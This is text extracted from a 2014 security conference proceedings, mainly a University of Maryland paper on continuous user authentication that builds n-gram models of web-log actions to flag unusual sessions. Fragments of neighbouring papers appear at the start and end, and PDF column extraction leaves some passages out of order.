[20] D. dos Santos, C. Merkle Westphall, and C. Becker Westphall, "A dynamic risk-based access control architecture for cloud computing," in Network Operations and Management Symposium (NOMS), 2014 IEEE, May 2014, pp. 1-9.
[21] P. Silva, C. Westphall, C. Westphall, M. Mattos, and D. Santos, "An architecture for risk analysis in cloud," in ICNS 2014, The Tenth International Conference on Networking and Services, 2014, pp. 29-33.
N-Gram-Based User Behavioral Model
for Continuous User Authentication
Leslie Milton, Bryan Robbins, and Atif Memon,
Department of Computer Science,
University of Maryland, College Park, MD, USA
{lmilton,brobbins,atif}@cs.umd.edu
Abstract—We posit that each of us is unique in our use of
computer systems. It is this uniqueness that we leverage in this
paper to “continuously authenticate users” while they use web
software. We build an n-gram model of each user’s interactions
with software. This probabilistic model essentially captures the
sequences and sub-sequences of user actions, their orderings, and
temporal relationships that make them unique. We therefore have
a model of how each user typically behaves. We then continuously
monitor each user during software operation; large deviations
from “normal behavior” can indicate malicious behavior. We
have implemented our approach in a system called Intruder
Detector (ID) that models user actions as embodied in the web
logs generated in response to the actions. Our experiments on a
large fielded system with web logs of approximately 320 users
show that (1) our model is indeed able to discriminate between
different user types and (2) we are able to successfully identify
deviations from normal behavior.
Keywords–behavioral modeling; continuous authentication;
software security; n-grams.
analysis. It is this footprint that we leverage to “continuously”
authenticate the user. We can construct models of any targeted group of sessions based on n-grams. n-gram models
have performed somewhat surprisingly well in the domain
of language modeling, where researchers have found that a
history of only one to two events is necessary to obtain
optimal predictive capabilities [7]. An n-gram model captures
all sequences and subsequences of a fixed length, N , from
previously observed user input, which allows prediction and
evaluation of future behavior based on frequencies. If we
assume that the event sequences carried out by users of a
software system are analogous to natural language, we would
expect to find similar predictive power in n-gram models of
software event sequences as well. To test the validity of our
approach, we seek to answer the following research questions:
I. INTRODUCTION
The idea of continuous user authentication (CUA) is not
new. The basic premise of CUA is that conventional user
authentication, usually performed during the initial login session, is insufficient. In conventional authentication, users are
not asked to verify their identity during their session, leaving
the computer system vulnerable to malicious or unintended
use while the user is logged-in. CUA techniques, on the
contrary, monitor, verify, and authenticate users during their
entire session. Functionally, CUA may be considered as one
example of an intrusion detection system (IDS). CUA can
be used to check the state of the system by continuously
monitoring user activity and comparing this activity with stored
usage profiles to alert and/or de-authenticate the user when
an intrusion is detected or suspected. IDS takes this one step
further by adding a second line of defense to pinpoint misuse
and initiate proper response [1]. Several studies have used
biometrics to continuously authenticate users by the use of
cognitive fingerprints, eye scans, color of user’s clothing, and
face tracking [2][3][4]. However, many of these techniques
require additional hardware and cost to operate efficiently.
Behavioral modeling addresses these limitations by monitoring
how users interact with the system. Evaluating mouse movement, how a user searches for and selects information, and the
habitual typing rhythm of users are traits used to continuously
observe a user’s behavior [5][6]. Although these approaches
do not require special hardware, most of them do require the
installation of specialized monitoring software.
In this paper, we posit we can obtain a unique behavioral
footprint indicating patterns of use for a specific user or group
of users of a particular web-based software using web log
1) Can we build discriminating user models to determine user types?
2) Can the model recognize various legitimate users who are operating in the same user session?
3) Can usage profiles be used to identify outliers in the user's behavior?
Our approach is different from that employed by [3]
because they focus on device usage and delays, mouse tracking, word usage, etc. Our approach also differs from various
biometric approaches [8][4][9][10][11]. We instead focus on a
particular layer of the software. With our approach, we evaluate
web log data generated by users of a web-based system. The
web logs are used to build unique profiles based on a user’s role
within the system. There is no need for additional hardware
since we are using information that is automatically generated
by the system. This process provides a continuous verification
technique with no interaction from the user, which not only
improves security but also enhances the usability of the system.
We feel that our new approach should be used together
with existing authentication mechanisms (e.g., passwords) to
provide an increased level of security demanded by today’s
computing environment. ID is just one more tool in the security
expert’s toolbox.
This work makes the following contributions:
1) We use n-grams to model the behavior of users while they interact with web-based software.
2) We show how keywords are abstracted from web logs to develop user footprints.
3) We develop a continuous user authentication technique with the ability to categorize user sessions into a pre-defined set of roles or potentially finer-grained user profiles.
The rest of the paper is organized as follows: Section II
provides details of related work. Section III defines the basis
of continuous user authentication and how we model this
activity using n-grams. Section IV describes our pilot study
with experimental results. The conclusion and future work are
discussed in Section V.
II. BACKGROUND & RELATED WORK
User authentication serves as a prevention-based method to
protect systems from malicious access. However, if a malicious
user is able to successfully pass the authentication step, there
should be a transparent method to detect their behavior. For
this reason, CUA is used as a second line of defense to
check the state of the system by continuously monitoring
user activity and simultaneously comparing this activity with
stored usage profiles to alert and/or de-authenticate the user.
Finally, the IDS takes over and performs misuse and anomaly
detection. The former identifies patterns of known attacks and
the latter detects intrusions by determining whether there is
some deviation from stored normal usage patterns.
Various research studies have explored the use of authentication. Kaminsky et al. address challenges for user
authentication in a global file system [12]. This approach
uses an authentication server to identify users based on local
information. Researchers of cloud computing security methods
have developed implicit authentication to identify a user’s past
behavior data to authenticate mobile devices [13]. These two
studies have one major limitation worth noting. They lack
the ability to continuously monitor user behavior for anomaly
detection.
The realm of CUA has been extensively evaluated with the
use of biometrics to verify user identity through the use
of unique behavioral and/or physical traits. A study by the
Defense Advanced Research Projects Agency (DARPA) uses a
combination of metrics that include eye scans and keystrokes
to evaluate how the user searches and selects information [3].
In addition, a number of research studies concerning CUA use
one or more hard and soft biometric traits to continuously
authenticate a user. Niinuma et al. propose a CUA framework
to automatically register the color of users’ clothing and their
face as soft biometric traits [4][2]. Results from this study
show that the system is able to successfully authenticate the
user with high tolerance to the user’s posture. Limitations to
these studies exist because of the additional hardware that is
needed to implement this technique which can become costly
if an entire organization uses this feature to authenticate users.
Altinok et al. propose a continuous biometric authentication system that provides an estimate of authentication
certainty at any given time, even in the absence of any
biometric data [10]. However, as the authentication uncertainty
increases over time, system usability decreases. In a similar
study, Kang et al. introduce temporal integration of biometrics
and behavioral features to continuously authenticate users [14].
Similar to the previous biometric studies, additional hardware
is needed.
A face tracking system that uses color and edge information has been used to compute behavioral features. Shen
et al. use mouse dynamics when implementing continuous
user authentication [5]. This technique is used to observe
behavioral features in mouse operations to detect malicious
users. However, there are some existing limitations with this
emerging approach. Behavioral variability occurs because of
human or environmental factors. Such changes could possibly
identify the correct user as an impostor.
Our study extends beyond the aforementioned research
studies in that: 1) Instead of using traditional biometric traits,
we explore the possibility of using web log information that is
automatically generated by web applications; 2) Our approach,
integrated into a prototype tool, uses a novel and simple
n-gram language model to capture user behavior; 3) Our
experiments are based on data from users of a government
system who are completing day-to-day tasks.
III. CONTINUOUS USER AUTHENTICATION
Our approach to CUA involves building n-gram models of
user activity by observing sequences of user interaction with a
web-based system. Once a model is constructed, we leverage
it for the classification of incoming event sequences. However,
the models are not without problems. While we have been able
to address some challenges with tool support, other challenges
remain. Below we formally define n-gram models, then present
our approach to dealing with fundamental risks of using this
type of model. Finally, we present algorithms for applying this
model to the CUA domain.
A. n-gram Models
In general, n-gram models capture a probability distribution
over some domain of events. As a simple example,
imagine that we would like to track the probability of a Sunny
(S) day or Rainy (R) day of weather. To learn the probability
of a Sunny day, we could observe days for some period of
time (e.g., 10 days), and count the number of Sunny days
observed, nSunny. Then, we could assign the likelihood of
a Sunny day occurring to be nSunny/10. When waking up each
morning, we assume that the probability of a Sunny day is
given by this same fixed rate. Under this interpretation, to find
P(SSSSS) (i.e., five Sunny days in a row), we would simply
solve P(S)^5. We can compute probabilities based on a set
of given observations. The observations can be mapped to a
series of class labels {w_0, w_1, w_2, ..., w_n}. Applying the chain
rule of probability theory yields the probability of a sequence
according to some prior context available at each data point:

P(w_1^n) = P(w_1) P(w_2 | w_1) ... P(w_n | w_1 w_2 ... w_{n-1})
         = P(w_1) P(w_2 | w_1) P(w_3 | w_1^2) ... P(w_n | w_1^{n-1})
         = \prod_{k=1}^{n} P(w_k | w_1^{k-1})                      (1)
The probability of P(SSSSS) would be given by
P(S) * P(S|S) * P(S|SS) * ...,
where P(S | S_1..S_n) is the probability of S given we have
seen the sequence S_1..S_n immediately prior to S. When
using this method, however, the number of parameters grows
exponentially with the number of keywords in the prior context. In
some cases, we can reasonably apply the Markov assumption,
which assumes that the probability of an event occurring
depends only on the current "state" of a system. This state
is defined as a fixed-length context or history, h.
n-gram models, then, are Markov models which use (N −
1) keywords of context to define the current state of the model.
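A minimal illustration of this construction for N=2 (bigrams), written in Python; this is a textbook sketch, not code from the Intruder Detector implementation:

```python
from collections import defaultdict

# Minimal bigram (N=2) model: estimate P(w_k | w_{k-1}) from observed
# sequences, then score a new sequence with the chain rule under the
# Markov assumption. Unsmoothed, illustrative sketch only.

def train_bigrams(sequences):
    """Count transitions prev -> cur over all training sequences."""
    counts = defaultdict(lambda: defaultdict(int))
    for seq in sequences:
        for prev, cur in zip(seq, seq[1:]):
            counts[prev][cur] += 1
    return counts

def sequence_probability(counts, seq):
    """Chain-rule probability of a sequence under the bigram model."""
    p = 1.0
    for prev, cur in zip(seq, seq[1:]):
        total = sum(counts[prev].values())
        if total == 0 or counts[prev][cur] == 0:
            return 0.0  # unseen transition; smoothing would avoid this
        p *= counts[prev][cur] / total
    return p
```

Without smoothing, any unseen transition zeroes out the whole sequence probability, which is exactly the sparsity problem the smoothing discussion below addresses.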
Constructing, or training, an n-gram model requires the ability
to observe example sequences occurring in the domain to be
modeled. To train a model well, we need to observe single
events from sequences in all relevant contexts.
The number of possible parameters needed by
the model grows not only with the number of events observed, but
also exponentially with the length of the history being considered.
For the best possible model, our training phase requires
observation of every possible event in every possible context.
Additionally, we need to observe each context multiple times
to have confidence that parameters are accurate. Without
sufficient training, we may encounter event sequences during
the test phase for which we have no knowledge to provide a
probability estimate.
Others from the natural language domain have addressed
this challenge of insufficient data for n-gram models. A
concept known as smoothing involves saving some probability
mass in an n-gram model’s probability distribution for unseen
events [15]. For the models in this paper, we have chosen to
use the Kneser-Ney smoothing technique [16]. At a high level,
Kneser-Ney involves:
• Reserving probability mass for unseen events by reducing all probabilities by a constant discounting percentage
• Estimating missing higher-order conditional probabilities by incorporating the observed frequencies of lower-order prefixes (a concept known as backoff)
• More precisely, combining the frequency of lower-order n-grams with a concept called a continuation probability, which estimates the probability that an event completes an n-gram, to estimate the probability of event sequences

Figure 1. n-gram model of User1 where n=3
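For bigrams, these ingredients combine into the interpolated Kneser-Ney estimate. The sketch below is a standard textbook formulation with a fixed discount d; it is an illustration, not the authors' implementation:

```python
from collections import defaultdict

# Interpolated Kneser-Ney for bigrams, illustrating the three ideas:
# constant discounting (d), reserved backoff mass (lam), and the
# continuation probability. Textbook sketch, not Intruder Detector code.

def kneser_ney(bigram_counts, d=0.75):
    """bigram_counts: dict history -> {word: count}. Returns P(w | h)."""
    continuations = defaultdict(set)  # histories each word completes
    total_types = 0                   # number of distinct bigram types
    for h, followers in bigram_counts.items():
        for w in followers:
            continuations[w].add(h)
            total_types += 1

    def prob(w, h):
        followers = bigram_counts.get(h, {})
        c_h = sum(followers.values())
        p_cont = len(continuations[w]) / total_types
        if c_h == 0:
            return p_cont  # unseen history: pure continuation probability
        discounted = max(followers.get(w, 0) - d, 0) / c_h
        lam = d * len(followers) / c_h  # probability mass reserved by d
        return discounted + lam * p_cont

    return prob
```

Note how the discounted term and the backoff term trade off: the mass removed by `d` from every seen bigram is exactly what `lam` redistributes according to the continuation probability.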
In statistical analysis, it is sometimes difficult to estimate
P (w|h). Figure 1 represents an n-gram model of User1,
where N=3 and h=2. In this figure, h is a sequence of the
(N − 1) previous keywords. Probabilities are not included
in this example. We deliberately keep the model simple by
showing how current keywords depend on previous keywords
when observing a sequence of actions. Since we are only
concerned with a history of h = 2, the (Start | Profile) state
is captured instead of (Start) as shown in Figure 1. As we
transition from (Start | Profile), we lose Start, but keep Profile
to arrive at the (Profile | Admin) state. Now, every state that
previously came from the Admin state, comes out of every
(<X> | Admin) state. Once we construct an n-gram model in
the training phase, we can use it for analysis of new event
sequences in the test phase. With the Markov assumption
incorporated into our construction of the model, we can apply
the chain rule for conditional probabilities with a history of
length N − 1 to estimate the probability of any event sequence
according to the existing model.
Finally, ID can be configured to incrementally improve its
models during execution. Consider that User1 executes a new
sequence of actions not contained in their n-gram model. This
can possibly occur due to an update of the user interface,
additional duties added to User1, etc. ID will recognize the
mismatch and ask for re-authentication (e.g., via a password or
supervisor approval). If this transaction is successful, then the
sequence of actions that was not recognized is added to the
n-gram model, thereby improving its accuracy. When fielded,
we envision ID being used first in a training mode to build baseline
models of all users, and then in a deployment mode.
C. User Categorization
During the test phase of our experiments, we assign a
probability to a sequence of events. We use binary categorization to judge a sequence as having likely been generated
by a specific model (PASS) or not (FAIL). We introduce a
probability threshold, t, for this pass/fail type of judgment
for a sequence. Any sequence whose probability exceeds this
threshold should be considered as a PASS, +1, and otherwise
considered FAIL, −1.
A decision rule is used to predict the class membership
of a given sequence of behavioral keywords, K. When new
samples are encountered, the following decision rule is used:

P(K, m) > t, then y = +1
P(K, m) < t, then y = −1                                           (2)
B. Challenges with n-gram Models
Even from a simple example, we see that additional data
typically only stands to improve the reliability of a probabilistic model. With n-gram models, we capture conditional
where P (K, m) is the probability the behavioral keyword
sequence is generated by the mth user’s n-gram model. The
probabilities are estimated using a training set of labeled
data, {(m0 , y0 ), (m1 , y1 ), (m2 , y2 ), ..., (mn , yn )}, where label
yi = ±1 and depends on the class of mi .
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
For a more complete consideration of Kneser-Ney smoothing, the reader is referred to the original reference [16]. For our
purpose, potential risks of applying Kneser-Ney to the domain
of events carried out on software are violations of key features
above. For example, if very few events are being performed
by users, applying a constant discounting to every probability
may save too much probability mass for unseen events. We
will revisit the appropriateness of the model after gathering
evidence in our experiments.
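A minimal sketch of the pass/fail rule in Eq. (2), assuming the model's score is supplied as a log-probability (a common choice to avoid numeric underflow; the paper does not specify the representation):

```python
def binary_categorize(model_log_prob, keywords, threshold):
    """Eq. (2): PASS (+1) if the model's estimate for the keyword
    sequence K exceeds threshold t, otherwise FAIL (-1).
    model_log_prob is assumed to return log P(K, m)."""
    return +1 if model_log_prob(keywords) > threshold else -1
```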
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A more complex scheme that can also be useful for continuous authentication is multi-class categorization [17] [18]. For
effective evaluation, this categorization method requires more
training and test data. Under this decision-making approach,
we can score an input sequence according to one of many
models, and categorize the sequence as belonging to the model
which estimates the highest probability. Therefore,

    u = arg max_m P(K, m)        (3)
We use binary categorization by a simple threshold and multi-class
categorization by comparing probabilities to translate n-gram
models' estimations of sequence probability into decisions.
We investigate our ability to make accurate decisions of
various types as supported by these algorithms.
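Eq. (3) amounts to a one-line argmax over per-model scores. A sketch, where `models` is a hypothetical mapping from role or user identifiers to scoring functions:

```python
def multiclass_categorize(models, keywords):
    """Eq. (3): u = arg max_m P(K, m). `models` maps each user or
    role id to a function returning that model's (log-)probability
    estimate for the keyword sequence."""
    return max(models, key=lambda m: models[m](keywords))
```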
IV. EXPERIMENT
We now describe a set of experiments carried out on real
user data designed to investigate the utility of n-gram models
for CUA. In particular, we investigate the following research
questions:
RQ1: Can we build discriminating user models to determine
user types?
RQ2: Can the model recognize various legitimate users who
are operating in the same user session?
RQ3: Can usage profiles be used to identify outliers in the
user’s behavior?
A. Subject System
We evaluate our proposed approach for CUA on an active
government training support website for the high performance
computing (HPC) community. This site is a repository for
online training material which provides training course registration, course evaluation, information on several domain
specific areas, and is a general source of information for its
community of users.
Figure 2. User Roles.
Each user account has an associated role. As shown in
Figure 2, approximately 3800 users are in the “users” group
which incorporates limited read access as well as the ability to
evaluate and register for courses. These users do not access the
system often. There are additional roles that provide access to
areas of the system that are meant for administrative purposes
(Admin, Management, Technologist). The most prominent of
these is the Admin role which has access to all areas. These
users interact with the system often. Therefore, while we have
more individual sessions available for the User role, the Admin
role provides more per-user and per-session data. The Admin
role also has the greatest risk for unauthorized use.
B. Data Collection
Because the system is web-based, access logs capturing
hypertext transfer protocol (HTTP) requests made to the web
server can provide sequences of user events. These logs are
generated by the Tomcat JavaServer Pages (JSP) and servlet
container. We analyzed the web log files for nine months to
get accurate usage data for the system. User activity is largely
based on role (i.e., access level). A user’s role is monitored
and used to verify their identity. This is under the assumption
that users within the same role are likely to perform similar
actions. System trust increases as the user interacts with the
system if no outliers are identified in the CUA user model.
To validate data captured in a user’s session, the following
steps were used for preprocessing [19]:
1) Data Cleaning: The process of data cleaning is very
important to generate an accurate picture of user
activity when navigating a web application. For web
logs of the subject system, various graphics and
scripts are generated which add several entries to
the log file. However, in our experiments, only
JSP entries show user behavior and are important for
logging purposes. Therefore, we remove all entries
that are not related to user activity.
2) User Identification: Once the data is clean, the
remaining file entries are grouped by individual user.
Each user-id is associated with a role. User-ids are not
continuously captured in the web log file. To overcome
this limitation, we check the session-id in a separate
database table to capture unique user-ids.
3) Session Identification: Session identification is used
to divide user accesses into individual sessions [19].
For the web access log, sessions are clearly identified.
After checking the database for the role of each user,
sessions are then grouped by role.
4) Keyword Generation: For each relevant JSP entry
in the individual user log, a portion of the string
is captured as a keyword. We do not consider
parameters in this process because user entries would
be too unique to categorize in a model.
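The four preprocessing steps can be sketched as a single pass over the access log. The log-line pattern and the session-to-user lookup below are hypothetical stand-ins; the actual Tomcat log format and database schema used by the authors are not given:

```python
import re

# Hypothetical log-line layout: "<session-id> <field> "GET <path> HTTP/1.x""
LOG_LINE = re.compile(r'(?P<session>\S+) \S+ "GET (?P<path>\S+) HTTP/1\.[01]"')

def preprocess(log_lines, session_to_user):
    """Steps 1-4: keep JSP entries, resolve users via session-id,
    group hits into per-user sessions, and strip query parameters
    to obtain behavioral keywords."""
    sessions = {}
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]    # 4) drop parameters
        if not path.endswith(".jsp"):              # 1) data cleaning
            continue
        user = session_to_user.get(m.group("session"))
        if user is None:                           # 2) user identification
            continue
        keyword = path.rsplit("/", 1)[-1]          # 4) keyword generation
        sessions.setdefault((user, m.group("session")), []).append(keyword)
    return sessions                                # 3) grouped sessions
```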
When predicting individual user behavior (i.e., the fine-grained
approach), we filter the web logs to retain only those users
who have at least two sessions of activity and at least 80
keywords, to ensure we have enough keyword data. After
applying this filter, 31 users met these criteria and were used
for this study. When predicting user types, 320 users were
identified. In addition, at least two user roles must be present
when predicting user types (i.e., user roles). To maintain the
purity of the evaluation, we separate data into training and test
sets, such that no model is evaluated on its ability to
classify data which was used during its own training.
C. Multi-class Categorization
For RQ1, we first want to consider whether unique profiles
can indeed be constructed. To evaluate this research question,
we develop models for each user role and use the multi-class
categorization approach. Because we have four groups of
users, a random model with no observation would achieve 25%
accuracy in categorizing users. If our models are effectively
capturing unique details about the behavior of users within
roles, we would expect to see much greater overall accuracy
in categorization. We test the approach by comparing ID’s
recommended category to the actual category of each test
session.
For the purpose of cross-validation, we performed various
data splits for training and test data, as seen in Figure 3 (50/50,
60/40, 70/30, 80/20, 90/10), to predict user roles. We reserve
a percentage of sessions based on the data split to represent
the testing set, E, and use the remaining data as the training
set, R, to train an order-N n-gram model for the specified
class. We calculate P(K, m) for each sample of keywords
K from E. This represents the probability that the keywords
are generated by the mth user's n-gram model. Finally, the m
with the highest probability for the behavioral keyword
sequence, P(K, m), is selected and used as the prediction value.
The y-axis (accuracy) in Figure 3 shows this value for each data
split.
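The session-level split into a training set R and test set E can be sketched as follows (the seeding and shuffling policy here is an assumption; the paper only states that training sessions were chosen at random):

```python
import random

def split_sessions(sessions, test_fraction, seed=0):
    """Reserve a fraction of sessions as the test set E and use the
    rest as the training set R (e.g., test_fraction=0.2 gives the
    paper's 80/20 split). Returns (R, E)."""
    pool = list(sessions)
    random.Random(seed).shuffle(pool)      # fixed seed for repeatability
    cut = int(len(pool) * test_fraction)
    return pool[cut:], pool[:cut]
```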
Figure 3. Prediction accuracy vs. n-gram order.
RQ1 results: Overall, the history order does not play a
significant role. However, we find that accuracy in correctly
categorizing test sequences into roles is highest when N = 2
for each data split under evaluation. Among the data splits
tested, the 80/20 split has the highest accuracy, 80.5%, when
N = 2. The reported accuracies mark the mean performance
over 10 separate trials, each of which chose random training
data. For the 154 test sessions identified under this split, ID
classified anywhere from 110 to 124 sessions correctly,
depending on the sessions randomly chosen as training data.
In most data splits, accuracy began to decrease as the model
order increased.
Based on these observations, we perform at a much greater
rate of accuracy than a random selection of 25%, suggesting
that at least some unique features of roles are effectively
detected by the models. This shows that using the models is
both feasible and appropriate moving forward.
Instead of focusing on the four pre-defined user roles, RQ2
focuses on the ability of n-gram models to capture the behavior
of specific users regardless of role. To evaluate this research
question, we first filter the data under consideration to include
only those users who have at least two sessions and at least
80 total keywords of input, to ensure we have enough data to
capture sequences. For the users meeting these criteria, we train
models according to the n-gram approach.
RQ2 results: We achieved an overall accuracy rate of only
46% on the task of correctly categorizing test sequences by
specific users. After filtering, we were left with only 28 test
sessions. The tool correctly classified anywhere from 11 to
13 sessions, depending on the sessions randomly chosen as
training data. As in RQ1, the 46% overall mark represents
the mean performance over 10 separate trials that were
generated using random training data. We achieved our best
results on this data when tuning model length to N = 2 and
implementing the 90/10 data split.
Working with so few test and training sessions, we have
very little confidence in our evaluation of user specific profiles.
In the future, we will be required to obtain much more data
per user to effectively consider the construction of user-specific
profiles.
D. Binary Categorization
When addressing RQ3, we want to consider whether the
role-specific profiles constructed as part of RQ1 are capable
of detecting outliers in user behavior. To evaluate this research
question, we use the models from RQ1 independently in a
binary categorization approach, as described in Section III-C.
Because this task uses models independently, we use both
training and test data from the remaining three roles to evaluate
the model's ability to reject uncharacteristic sequences (i.e.,
negative examples). In addition, we use only test data from
the model's own role to evaluate its ability to accept valid
sequences (i.e., positive examples). Additionally, we would
like to consider the effect of test sequence length (i.e., the
number of keywords in an input sequence) on the performance
of this task.
Finally, we track only a single threshold value for this
task even though sequence length varies. A threshold which
performs well for input sequences of length two would likely
overestimate the threshold needed for longer lengths. As an
alternative, we adapt the model's output probability into an
entropy-based indicator, a measure of uncertainty in a system.
This gives us the ability to normalize by the length of the input
sequence. By doing so, we maintain a single threshold value
for the binary classification task.
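The length normalization can be sketched as dividing the sequence's log-probability by its length, yielding a per-keyword score comparable across lengths (the paper's exact entropy formulation and logarithm base are not specified; the threshold of -0.6 used in RQ3 is on such a normalized scale):

```python
def normalized_score(log_prob, length):
    """Per-keyword average log-probability; its negation estimates
    the entropy rate, making sequences of different lengths
    comparable under one threshold."""
    return log_prob / length

def binary_decision(log_prob, length, threshold=-0.6):
    """PASS (+1) when the normalized score clears the single threshold."""
    return +1 if normalized_score(log_prob, length) > threshold else -1
```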
RQ3 results: Of all three research questions we consider,
RQ3 relates most directly to the CUA goal of ID. Strong
experimental results are observed when accepting or rejecting
snippets of user sessions based on role. We tested each model
against every available subsequence of user keywords, from
lengths two to nine, with a probability threshold of -0.6. We
obtained our best performance on this data when using N = 9.
Recall that backoff and smoothing in the model allow for
the assignment of probabilities to a sequence of any length,
regardless of the maximum history considered. Figures 4, 5,
6, and 7 show our findings. Note that accuracy is plotted
separately for positive and negative test samples to analyze the
model's ability to reject uncharacteristic sequences and accept
valid sequences.
We summarize the results as follows:
• As expected, the length of session examples provided
to models significantly affects the ability to correctly
classify the example.
• The effect of length was much greater on negative
examples, as failures due to rejecting a positive sample
were rare for lengths greater than four.
• The User model performed at a level greater than 90%
on all samples for lengths greater than three.
Figure 4. User n-gram model.
Figure 5. Admin n-gram model.
Figure 6. Technologist n-gram model.
Figure 7. Management n-gram model.
• The Management model eventually achieved performance
of 92%, though this took sessions of length nine.
• The Admin and Management models averaged 71%
and 68% on negative examples, respectively, even at
the maximum considered length of nine.
From these results, we can conclude that binary categorization
is much more effective than a random baseline at detecting
uncharacteristic user behavior. For two of the four models
considered, we achieved above 90% correct identification of
negative samples and 100% correct acceptance of positive
samples. In particular, the finding that User sessions can easily
be protected against uncharacteristic usage is promising. Due
to a large data set and an elevated level of privileges for tasks,
we expected the Admin user role to have one of the strongest
models, but this was not observed. In general, n-gram models
seem much better suited for binary categorization tasks such
as this one, especially given limited amounts of available data.
In the future, perhaps multi-class categorization problems
could be restated as a series of binary decisions.
Alternatively, the improvement in performance could be
due to the use of shorter sessions which are less likely to
contain unseen events. In this case, we rely on the validity of
smoothing assumptions for accurate probability estimation. In
the future, we will consider the effect of test example length
on other tasks performed by ID as well.
V. CONCLUSIONS & FUTURE WORK
In this paper, we propose a continuous probabilistic authentication
approach to model the behavior of users that interact
with web-based software. A significant advantage of this mode
of authentication is that it can be employed throughout the
period of interaction and, hence, provides a natural way to
continuously authenticate users. We have built a prototype,
Intruder Detector, which keeps track of user actions, builds user
profiles based on the n-gram language model, and uses these
models to discriminate between user roles and, potentially,
finer-grained user profiles. Results show that Intruder Detector
achieves 80.5% accuracy in user role classification tasks and
nearly perfect accuracy when identifying categorization errors.
Although our pilot study has shown promising results,
much work remains. In the immediate short term, we intend
to work with a larger data set and compare various smoothing
techniques. This will help improve the accuracy of RQ2 in
correctly categorizing individual users. Capturing more data
will help us to better understand the characteristics of good,
well-trained user models. We also plan to work out the details of
fielding ID and evaluate two modes of operation: training,
in which models get built; and deployment, in which the
models get used for CUA. Afterwards, we will evaluate an
alternative fielding strategy, one in which we have another
level of authentication, using conventional means, in case ID
identifies an intruder; this strategy will allow the models to
iteratively get better (i.e., more accurate) with time.
ACKNOWLEDGMENT
This material is based on research sponsored by DARPA
under agreement number FA8750-14-2-0039. The U.S. Government is authorized to reproduce and distribute reprints for
Governmental purposes notwithstanding any copyright notation thereon.
REFERENCES
[1] J. Liu, F. Yu, C.-H. Lung, and H. Tang, “Optimal combined intrusion detection and biometric-based continuous authentication in high security mobile ad hoc networks,” IEEE Transactions on Wireless Communications, vol. 8, no. 2, Feb. 2009, pp. 806–815.
[2] K. Niinuma, U. Park, and A. K. Jain, “Soft biometric traits for continuous user authentication,” Trans. Info. For. Sec., vol. 5, no. 4, Dec. 2010, pp. 771–780. [Online]. Available: http://dx.doi.org/10.1109/TIFS.2010.2075927
[3] R. P. Guidorizzi, “Security: Active authentication,” IT Professional, vol. 15, no. 4, 2013, pp. 4–7.
[4] K. Niinuma, A. K. Jain, J. B. Kumar, S. Prabhakar, and A. A. Ross, “Continuous user authentication using temporal information,” SPIE, vol. 7667, 2010.
[5] C. Shen, Z. Cai, and X. Guan, “Continuous authentication for mouse dynamics: A pattern-growth approach,” in Proceedings of the 2012 42nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), ser. DSN ’12. Washington, DC, USA: IEEE Computer Society, 2012, pp. 1–12. [Online]. Available: http://dl.acm.org/citation.cfm?id=2354410.2355184
[6] F. Monrose and A. D. Rubin, “Keystroke dynamics as a biometric for authentication,” Future Gener. Comput. Syst., vol. 16, no. 4, Feb. 2000, pp. 351–359. [Online]. Available: http://dx.doi.org/10.1016/S0167-739X(99)00059-X
[7] D. Jurafsky and J. Martin, Speech and Language Processing: An Introduction to Natural Language Processing, Computational Linguistics, and Speech Recognition, 2nd ed. Pearson Prentice Hall, 2009.
[8] S. Zhang, R. Janakiraman, T. Sim, and S. Kumar, “Continuous verification using multimodal biometrics,” in Proceedings of the 2006 International Conference on Advances in Biometrics, ser. ICB’06. Berlin, Heidelberg: Springer-Verlag, 2006, pp. 562–570. [Online]. Available: http://dx.doi.org/10.1007/11608288 75
[9] A. Azzini and S. Marrara, “Impostor users discovery using a multimodal biometric continuous authentication fuzzy system,” in Proceedings of the 12th International Conference on Knowledge-Based Intelligent Information and Engineering Systems, Part II, ser. KES ’08. Berlin, Heidelberg: Springer-Verlag, 2008, pp. 371–378. [Online]. Available: http://dx.doi.org/10.1007/978-3-540-85565-1 47
[10] A. Altinok and M. Turk, “Temporal integration for continuous multimodal biometrics,” in Multimodal User Authentication, 2003, pp. 11–12.
[11] A. J. Klosterman and G. R. Ganger, “Secure continuous biometric-enhanced authentication,” Tech. Rep., 2000.
[12] M. Kaminsky, G. Savvides, D. Mazieres, and M. F. Kaashoek, “Decentralized user authentication in a global file system,” in Proceedings of the Nineteenth ACM Symposium on Operating Systems Principles, ser. SOSP ’03. New York, NY, USA: ACM, 2003, pp. 60–73. [Online]. Available: http://doi.acm.org/10.1145/945445.945452
[13] R. Chow, M. Jakobsson et al., “Authentication in the clouds: A framework and its application to mobile users,” in Proceedings of the 2010 ACM Workshop on Cloud Computing Security Workshop, ser. CCSW ’10. New York, NY, USA: ACM, 2010, pp. 1–6. [Online]. Available: http://doi.acm.org/10.1145/1866835.1866837
[14] H. B. Kang and M. H. Ju, “Multi-modal feature integration for secure authentication,” in Proceedings of the 2006 International Conference on Intelligent Computing - Volume Part I, ser. ICIC’06. Berlin, Heidelberg: Springer-Verlag, 2006, pp. 1191–1200. [Online]. Available: http://dx.doi.org/10.1007/11816157 148
[15] S. F. Chen and J. Goodman, “An empirical study of smoothing techniques for language modeling,” in Proceedings of the 34th Annual Meeting of the Association for Computational Linguistics, 1996, pp. 310–318.
[16] R. Kneser and H. Ney, “Improved backing-off for m-gram language modeling,” in Acoustics, Speech, and Signal Processing, 1995 International Conference on (ICASSP-95), vol. 1, 1995, pp. 181–184.
[17] Y. Liu, Z. You, and L. Cao, “A novel and quick svm-based multi-class classifier,” Pattern Recogn., vol. 39, no. 11, Nov. 2006, pp. 2258–2264. [Online]. Available: http://dx.doi.org/10.1016/j.patcog.2006.05.034
[18] P. Honeine, Z. Noumir, and C. Richard, “Multiclass classification machines with the complexity of a single binary classifier,” Signal Processing, vol. 93, no. 5, 2013, pp. 1013–1026. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0165168412004045
[19] R. Cooley, B. Mobasher, and J. Srivastava, “Data preparation for mining world wide web browsing patterns,” Knowledge and Information Systems, vol. 1, 1999, pp. 5–32.
GAIA-MLIS: A Maturity Model for Information Security
Roger W. Coelho, Gilberto Fernandes Jr., and Mario Lemes Proença Jr.
Computer Science Department, State University of Londrina (UEL), Londrina, Brazil
rogercoelho04@uol.com.br, gil.fernandes6@gmail.com, proenca@uel.br
Abstract— Information security management has become one
of the most important areas for organizations in recent times.
